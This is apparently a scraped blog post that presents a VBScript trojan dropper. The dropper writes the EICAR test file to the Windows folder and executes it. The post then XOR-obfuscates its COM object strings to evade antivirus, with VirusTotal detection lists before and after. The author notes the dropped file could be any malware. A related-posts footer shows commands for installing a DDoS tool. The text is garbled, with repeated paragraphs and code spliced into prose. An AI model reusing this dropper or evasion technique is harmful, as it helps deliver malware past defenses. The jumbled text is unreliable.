 |
| Source:pixabay.com |
In this antivirus challange case, I will do some simple things by creating a VBS trojan dropper then I will apply string encryption to some particular strings. In this case I will encrypt "Scripting.FileSystemObject" and "WScript.Shell". Later I will compare the antivirus detection between original trojan and trojan with encrypted string.
Here's the trojan code:
t="58,35,4F,21,50,25,40,41,50,5B,34,5C,50,5A,58,35,34,28,50,5E,29,37,432,29,37,7D,24,45,49,43,41,52,2D,53,54,41,4E,44,41,52,44,2D,41,4E,54,49,56,49,52,55,53,2D,54,45,53,54,2D,46,49,4C,45"
t=t&",21,24,48,2B,48,2A"
tmp = Split(t, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = fso.getspecialfolder(0) & "\eicar.com"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
WScript.CreateObject("WScript.Shell").run(pth) The trojan will drop eicar file and execute it. In reality, the dropped file can be any malware.
For the encryption function, I will use a simple xor algorithm.
Original trojan: https://www.virustotal.com/#/file/70887a9f231d4289ccf96b6486393f0a43e5162c0e19a36b978c8b5bd6eec1f2/detection
Successful antivirus:
Successful antivirus:
About the detection rate, I can say antivirus that don't detect the malware sample have bad malware script detection. ClamAV, DrWeb, ESET-NOD32, Yandex quite good but it is easy to bypass the detection.
Next time, I will encrypt the hex code of eicar file and let's see if this technique can bypass your antivirus protection.
End If
Next
f.Close
WScript.CreateObject("WScript.Shell").run(pth) The trojan will drop eicar file and execute it. In reality, the dropped file can be any malware.
For the encryption function, I will use a simple xor algorithm.
Function CryptXor(sText)If the encryption has been applied then there are two line modified:
Dim I
Dim RetStr
Dim Charuse,CharPwd
For I = 1 to Len(sText)
charuse = Mid(sText,I,1)
charpwd = Mid("0",(I mod len("0"))+1,1)
retstr = retstr + chr(asc(charuse) xor asc(charpwd))
Next
CryptXor = retstr
End Function
Set fso = CreateObject(CryptXor ("cSBY@DY^W vY\UcICDU]RZUSD"))Now I will scan the original and the encrypted version. Here'are the results:
and
WScript.CreateObject(CryptXor("gcSBY@D cXU\\")).run(pth)
Original trojan: https://www.virustotal.com/#/file/70887a9f231d4289ccf96b6486393f0a43e5162c0e19a36b978c8b5bd6eec1f2/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, ClamAV, DrWeb, Emsisoft, eScan, ESET-NOD32, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Yandex, Zillya, ZoneAlarmFailed antivirus:
AegisLab, AhnLab-V3, Antiy-AVL, Avast Mobile Security, Avira, Babable, Bkav, CAT-QuickHeal, CMC, Cyren, F-Prot, Fortinet, Ikarus, Jiangmin, K7AntiVirus, K7GW, Kingsoft, Malwarebytes, McAfee, McAfee-GW-Edition, Microsoft, Panda, Qihoo-360, Rising, Sophos AV, SUPERAntiSpyware, Symantec, TACHYON, Tencent, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, VIPRE, ViRobot, Zoner, Alibaba, CrowdStrike Falcon, Cybereason, Cylance, eGambit, Endgame, Palo Alto Networks, SentinelOne, Sophos ML, Symantec Mobile Insight, Trustlook, WebrootEncrypted trojan: https://www.virustotal.com/#/file/a40b07d7fa2a7a11d5be19ac7f151cfe7dd65b2168fa4f0f6f24de848b89ff45/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, Emsisoft, eScan, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Zillya, ZoneAlarmThere are four antivirus that become fail to detect the encrypted version:
ClamAV, DrWeb, ESET-NOD32, YandexAs you can see from the VirusTotal link, most of antivirus still detect the threat as eicar because the VBS trojan contain hex code of eicar file.
About the detection rate, I can say antivirus that don't detect the malware sample have bad malware script detection. ClamAV, DrWeb, ESET-NOD32, Yandex quite good but it is easy to bypass the detection.
Next time, I will encrypt the hex code of eicar file and let's see if this technique can bypass your antivirus protection.
AegisLab, AhnLab-V3, Antiy-AVL, Avast Mobile Security, Avira, Babable, Bkav, CAT-QuickHeal, CMC, Cyren, F-Prot, Fortinet, Ikarus, Jiangmin, K7AntiVirus, K7GW, Kingsoft, Malwarebytes, McAfee, McAfee-GW-Edition, Microsoft, Panda, Qihoo-360, Rising, Sophos AV, SUPERAntiSpyware, Symantec, TACHYON, Tencent, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, VIPRE, ViRobot, Zoner, Alibaba, CrowdStrike Falcon, Cybereason, Cylance, eGambit, Endgame, Palo Alto Networks, SentinelOne, Sophos ML, Symantec Mobile Insight, Trustlook, WebrootEncrypted trojan: https://www.virustotal.com/#/file/a40b07d7fa2a7a11d5be19ac7f151cfe7dd65b2168fa4f0f6f24de848b89ff45/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, Emsisoft, eScan, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Zillya, ZoneAlarmThere are four antivirus that become fail to detect the encrypted version:
ClamAV, DrWeb, ESET-NOD32, YandexAs you can see from the VirusTotal link, most of antivirus still detect the threat as eicar because the VBS trojan contain hex code of eicar file.
About the detection rate, I can say antivirus that don't detect the malware sample have bad malware script detection. ClamAV, DrWeb, ESET-NOD32, Yandex quite good but it is easy to bypass the detection.
Next time, I will encrypt the hex code of eicar file and let's see if this technique can bypass your antivirus protection.
Related Posts
- Cara Menciptakan Nama Facebook Kosong 2019 Banyaknya orang yang ingin tau cara menciptakan akun hantu atau akun demitfacebook menciptakan saya ingin menyebarkan sedikit cara membuatnya, tips ...
- Dragon Ball Z Cell Games Saga Episode 1 The cell games saga is the tenth saga in the dragon ball z series. the manga volumes that comprise it are "the cell g ...
- Game Online Nhap Vai Cho Apk Apk mod shadow of death mod – game nhập vai hay cho android. thảo luận trong 'game android mod (checked)' bắt ...
- Untuk Menjalankan Nya Atau Mulai Men Ddos Nya Tinggal Ketikan Perintah pkg update pkg upgrade pkg install python pkg install git git clone https://github.com/cyweb/hammer cd hammer python hammer.py Untuk menjalankan n ...
- Russian Airborne Troops Call Of Duty The russian airborne troops or vdv (from "vozdushno-desantnye voyska rossii", russian: ...
- Is Title [ ...